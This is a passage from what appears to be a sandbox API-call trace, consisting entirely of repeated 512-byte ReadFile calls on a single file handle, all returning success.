lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.162] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.163] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.164] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.165] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.166] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.167] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.168] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.169] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.170] 